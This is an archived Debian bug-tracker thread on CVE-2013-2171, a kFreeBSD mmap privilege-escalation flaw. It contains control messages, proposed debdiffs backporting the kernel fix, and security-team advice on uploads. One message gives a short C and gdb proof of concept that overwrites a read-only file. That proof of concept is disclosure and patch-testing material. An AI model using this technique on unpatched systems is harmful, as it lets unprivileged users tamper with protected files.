Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Steven Chamberlain ste...@pyro.eu.org writes: Please could you do an upload of SVN r4525 to unstable? I guess you mean 4523? or some special branch? Christoph -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
On 21/06/13 09:56, Christoph Egger wrote: Steven Chamberlain ste...@pyro.eu.org writes: Please could you do an upload of SVN r4525 to unstable? I guess you mean 4523? or some special branch? Actually yes I meant r4523, although the more recent commits didn't change anything in /trunk/kfreebsd-9. Regards, -- Steven Chamberlain ste...@pyro.eu.org -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
A suggested workaround on vulnerable systems is: sysctl security.bsd.unprivileged_proc_debug=0 (which works by disabling some functionality of GDB to non-root users) Also the use of jails or securelevel could reduce the potential damage. Regards, -- Steven Chamberlain ste...@pyro.eu.org -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Processed: Re: Bug#712664: Info received (Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap)
Processing commands for cont...@bugs.debian.org: forwarded 712664 http://security.freebsd.org/advisories/FreeBSD-SA-13:06.mmap.asc Bug #712664 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap Set Bug forwarded-to-address to 'http://security.freebsd.org/advisories/FreeBSD-SA-13:06.mmap.asc'. clone 712664 -1 Bug #712664 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap Bug 712664 cloned as bug 712892 reassign -1 src:kfreebsd-10 Bug #712892 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap Bug reassigned from package 'src:kfreebsd-9' to 'src:kfreebsd-10'. No longer marked as found in versions kfreebsd-9/9.0-11 and kfreebsd-9/9.0~svn223109-0.1. Ignoring request to alter fixed versions of bug #712892 to the same values previously set retitle -1 kfreebsd-10: CVE-2013-2171: Privilege escalation via mmap Bug #712892 [src:kfreebsd-10] kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap Changed Bug title to 'kfreebsd-10: CVE-2013-2171: Privilege escalation via mmap' from 'kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap' # not a real package version, but it or any later version will fix this fixed -1 kfreebsd-10/10.0~svn251901-1 Bug #712892 [src:kfreebsd-10] kfreebsd-10: CVE-2013-2171: Privilege escalation via mmap The source kfreebsd-10 and version 10.0~svn251901-1 do not appear to match any binary packages Marked as fixed in versions kfreebsd-10/10.0~svn251901-1. thanks Stopping processing here. Please contact me if you need assistance. -- 712664: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=712664 712892: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=712892 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Processed: Re: Bug#712664: Info received (Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap)
Processing commands for cont...@bugs.debian.org: found 712664 10.0~svn242489-1 Bug #712664 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap The source 'kfreebsd-9' and version '10.0~svn242489-1' do not appear to match any binary packages Marked as found in versions kfreebsd-9/10.0~svn242489-1. found 712664 10.0~svn225709-1 Bug #712664 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap The source 'kfreebsd-9' and version '10.0~svn225709-1' do not appear to match any binary packages Marked as found in versions kfreebsd-9/10.0~svn225709-1. thanks Stopping processing here. Please contact me if you need assistance. -- 712664: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=712664 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Processed: Re: Bug#712664: Info received (Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap)
Processing commands for cont...@bugs.debian.org: # grrr notfound 712664 10.0~svn242489-1 Bug #712664 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap The source 'kfreebsd-9' and version '10.0~svn242489-1' do not appear to match any binary packages No longer marked as found in versions kfreebsd-9/10.0~svn242489-1. notfound 712664 10.0~svn225709-1 Bug #712664 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap The source 'kfreebsd-9' and version '10.0~svn225709-1' do not appear to match any binary packages No longer marked as found in versions kfreebsd-9/10.0~svn225709-1. found 712892 10.0~svn242489-1 Bug #712892 [src:kfreebsd-10] kfreebsd-10: CVE-2013-2171: Privilege escalation via mmap Marked as found in versions kfreebsd-10/10.0~svn242489-1. found 712892 10.0~svn225709-1 Bug #712892 [src:kfreebsd-10] kfreebsd-10: CVE-2013-2171: Privilege escalation via mmap Marked as found in versions kfreebsd-10/10.0~svn225709-1. thanks Stopping processing here. Please contact me if you need assistance. -- 712664: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=712664 712892: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=712892 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Hi Christoph,
Please could you do an upload of SVN r4525 to unstable?
kfreebsd-9 as shipped with wheezy is indeed vulnerable and I can confirm
now that the fix works too.
Unfortunately the vulnerability is as simple and as serious as it
sounds. A non-privileged user can overwrite any file having only read
permissions.
# cat /etc/foo
steven:x:1000:1000:,,,:/home/steven:/bin/bash
$ gdb testcase
(gdb) run
Program received signal SIGSEGV, Segmentation fault.
0x00400631 in main () at main.c:13
13 *ptr = 0; /* this will segfault */
(gdb) set {char}(ptr+9) = 0x30
(gdb)
# cat /etc/foo
steven:x::1000:,,,:/home/steven:/bin/bash
Regards,
--
Steven Chamberlain
ste...@pyro.eu.org
#include stdio.h
#include errno.h
#include unistd.h
#include sys/mman.h
int main() {
FILE *fp = fopen(/etc/foo, r);
int fd = fileno (fp);
unsigned char *ptr = mmap (NULL, 4096, PROT_READ, MAP_SHARED, fd, 0);
if (ptr = 0) return -1;
*ptr = 0; /* this will segfault */
return 0;
}
Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Attached are proposed debdiffs for an upload to wheezy-security, based
on the version currently in wheezy.
The versioning scheme for the last security upload (with +deb70.$n)
looks a bit weird to me (and it has lower value than the next changelog
entry). So I also attach a second debdiff, proposing a different form.
Please could someone with the necessary access, open a security.d.o RT
ticket asking permission to upload whichever one of these, and for a DSA
to be issued?
Thanks!
Regards,
--
Steven Chamberlain
ste...@pyro.eu.org
diff -Nru kfreebsd-9-9.0/debian/changelog kfreebsd-9-9.0/debian/changelog
--- kfreebsd-9-9.0/debian/changelog 2013-05-01 13:59:20.0 +0100
+++ kfreebsd-9-9.0/debian/changelog 2013-06-19 20:49:15.0 +0100
@@ -1,3 +1,17 @@
+kfreebsd-9 (9.0-10+deb70.2) wheezy-security; urgency=high
+
+ * Upload for wheezy-security
+
+ -- Steven Chamberlain ste...@pyro.eu.org Wed, 19 Jun 2013 20:36:54 +0100
+
+kfreebsd-9 (9.0-12) unstable; urgency=high
+
+ * Team upload.
+ * Pick SVN 251902 from FreeBSD 9-STABLE to fix SA-13:06 / CVE-2013-2171:
+Privilege escalation via mmap (Closes: #712664)
+
+ -- Steven Chamberlain ste...@pyro.eu.org Tue, 18 Jun 2013 13:20:50 +0100
+
kfreebsd-9 (9.0-10+deb70.1) wheezy-security; urgency=high
* Upload for wheezy-security
diff -Nru kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch
kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch
--- kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch 1970-01-01
01:00:00.0 +0100
+++ kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch 2013-06-19
20:49:15.0 +0100
@@ -0,0 +1,28 @@
+Description:
+ Fix a bug that allowed a tracing process (e.g. gdb) to write
+ to a memory-mapped file in the traced process's address space
+ even if neither the traced process nor the tracing process had
+ write access to that file. [13:06]
+ (CVE-2013-2171)
+Origin: vendor, http://security.freebsd.org/patches/SA-13:06/mmap.patch
+Bug: http://security.freebsd.org/advisories/FreeBSD-SA-13:06.mmap.asc
+Bug-Debian: http://bugs.debian.org/712664
+Applied-Upstream: http://svnweb.freebsd.org/base?view=revisionrevision=251902
+
+Index: kfreebsd-9-9.0/sys/vm/vm_map.c
+===
+--- kfreebsd-9-9.0.orig/sys/vm/vm_map.c2011-07-06 21:06:44.0
+0100
kfreebsd-9-9.0/sys/vm/vm_map.c 2013-06-18 13:39:13.104790989 +0100
+@@ -3704,6 +3704,12 @@
+ vm_map_unlock_read(map);
+ return (KERN_PROTECTION_FAILURE);
+ }
++ if ((fault_typea VM_PROT_COPY) != 0
++ (entry-max_protection VM_PROT_WRITE) == 0
++ (entry-eflags MAP_ENTRY_COW) == 0) {
++ vm_map_unlock_read(map);
++ return (KERN_PROTECTION_FAILURE);
++ }
+
+ /*
+* If this page is not pageable, we have to get it for all possible
diff -Nru kfreebsd-9-9.0/debian/patches/series
kfreebsd-9-9.0/debian/patches/series
--- kfreebsd-9-9.0/debian/patches/series2013-05-01 13:21:35.0
+0100
+++ kfreebsd-9-9.0/debian/patches/series2013-06-19 20:49:15.0
+0100
@@ -9,6 +9,7 @@
svn239447_SCTP_DoS.patch
SA-12_08.linux.patch
SA-13_05.nfsserver.patch
+SA-13_06.mmap.patch
# Other patches that might or might not be mergeable
001_misc.diff
diff -Nru kfreebsd-9-9.0/debian/changelog kfreebsd-9-9.0/debian/changelog
--- kfreebsd-9-9.0/debian/changelog 2013-05-01 13:59:20.0 +0100
+++ kfreebsd-9-9.0/debian/changelog 2013-06-19 21:12:56.0 +0100
@@ -1,3 +1,11 @@
+kfreebsd-9 (9.0-12~deb7u1) wheezy-security; urgency=high
+
+ * Team upload.
+ * Pick SVN 251902 from FreeBSD 9-STABLE to fix SA-13:06 / CVE-2013-2171:
+Privilege escalation via mmap (Closes: #712664)
+
+ -- Steven Chamberlain ste...@pyro.eu.org Tue, 18 Jun 2013 13:20:50 +0100
+
kfreebsd-9 (9.0-10+deb70.1) wheezy-security; urgency=high
* Upload for wheezy-security
diff -Nru kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch
kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch
--- kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch 1970-01-01
01:00:00.0 +0100
+++ kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch 2013-06-19
20:49:15.0 +0100
@@ -0,0 +1,28 @@
+Description:
+ Fix a bug that allowed a tracing process (e.g. gdb) to write
+ to a memory-mapped file in the traced process's address space
+ even if neither the traced process nor the tracing process had
+ write access to that file. [13:06]
+ (CVE-2013-2171)
+Origin: vendor, http://security.freebsd.org/patches/SA-13:06/mmap.patch
+Bug: http://security.freebsd.org/advisories/FreeBSD-SA-13:06.mmap.asc
+Bug-Debian: http://bugs.debian.org/712664
+Applied-Upstream: http://svnweb.freebsd.org/base?view=revisionrevision=251902
+
+Index: kfreebsd-9-9.0/sys/vm/vm_map.c
+===
+--- kfreebsd-9-9.0.orig/sys/vm/vm_map.c2011-07-06 21:06:44.0
+0100
Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Hi Steven, Cc'ing team@security.d.o On Wed, Jun 19, 2013 at 09:23:49PM +0100, Steven Chamberlain wrote: Attached are proposed debdiffs for an upload to wheezy-security, based on the version currently in wheezy. Thanks Steven and Christoph for working on this issue. The versioning scheme for the last security upload (with +deb70.$n) looks a bit weird to me (and it has lower value than the next changelog entry). So I also attach a second debdiff, proposing a different form. Debdiff should be based on current wheezy(-security) version, so make the debdiff part for the changelog (i.e. without the unstable changelog part): diff -Nru kfreebsd-9-9.0/debian/changelog kfreebsd-9-9.0/debian/changelog --- kfreebsd-9-9.0/debian/changelog 2013-05-01 13:59:20.0 +0100 +++ kfreebsd-9-9.0/debian/changelog 2013-06-19 20:49:15.0 +0100 @@ -1,3 +1,17 @@ +kfreebsd-9 (9.0-10+deb70.2) wheezy-security; urgency=high + + * Team upload. + * Upload for wheezy-security + * Pick SVN 251902 from FreeBSD 9-STABLE to fix SA-13:06 / CVE-2013-2171: +Privilege escalation via mmap (Closes: #712664) + + -- Steven Chamberlain ste...@pyro.eu.org Wed, 19 Jun 2013 20:36:54 +0100 + kfreebsd-9 (9.0-10+deb70.1) wheezy-security; urgency=high * Upload for wheezy-security [...] The versioning is indeed a bit ugly (preferred would have beeen also for the previous one +deb7uX, and incrementing X, there is a pending update for dev-ref describing this, see [1]). [1] http://bugs.debian.org/709218 Please could someone with the necessary access, open a security.d.o RT ticket asking permission to upload whichever one of these, and for a DSA to be issued? Small remark on this one: You also can do that in every case, no necessary permissions for RT are needed: write a mail to secur...@rt.debian.org with subject containing [Debian RT], see [2]. [2] http://wiki.debian.org/rt.debian.org#Security_Team Regards, Salvatore -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Source: kfreebsd-9 Version: 9.0-11 Severity: grave Tags: security upstream Control: found -1 kfreebsd-9/9.0~svn223109-0.1 Privilege escalation via mmap: http://security.freebsd.org/advisories/FreeBSD-SA-13:06.mmap.asc This was introduced by r199819 when FreeBSD 9 was the SVN head. As such it affects 9.0 as well as 10.0 snapshots before today; I'm preparing a backport from 9-STABLE. -- System Information: Debian Release: wheezy/sid APT prefers testing APT policy: (500, 'testing'), (1, 'experimental') Architecture: kfreebsd-amd64 (x86_64) Kernel: kFreeBSD 9.0-2-amd64 Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Versions of packages kfreebsd-image-9.0-2-amd64 depends on: ii devd 9.0+ds1-9 ii freebsd-utils 9.0+ds1-9 ii kbdcontrol 9.0+ds1-9 ii kldutils 9.0+ds1-9 kfreebsd-image-9.0-2-amd64 recommends no packages. kfreebsd-image-9.0-2-amd64 suggests no packages. -- no debconf information -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Control: tags -1 pending This is staged in SVN trunk as r4525, intended for upload to unstable very soon (and then we should request a DSA for wheezy). I'd like to know first that the fix is really working and didn't break anything. All I know yet is that it builds. p.s. I didn't see any SVN commit mails from Alioth, I wonder if something there is broken... Regards, -- Steven Chamberlain ste...@pyro.eu.org -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Processed: Re: Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Processing control commands: tags -1 pending Bug #712664 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap Added tag(s) pending. -- 712664: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=712664 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Hi! Steven Chamberlain ste...@pyro.eu.org writes: This is staged in SVN trunk as r4525, intended for upload to unstable very soon (and then we should request a DSA for wheezy). I'd like to know first that the fix is really working and didn't break anything. All I know yet is that it builds. I can probably install it on the 2 kfreebsd-amd64 production systems here for testing tomorrow if you want. Also, feel free to ping we wrt upload. Christoph -- 9FED 5C6C E206 B70A 5857 70CA 9655 22B9 D49A E731 Debian Developer | Lisp Hacker | CaCert Assurer -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
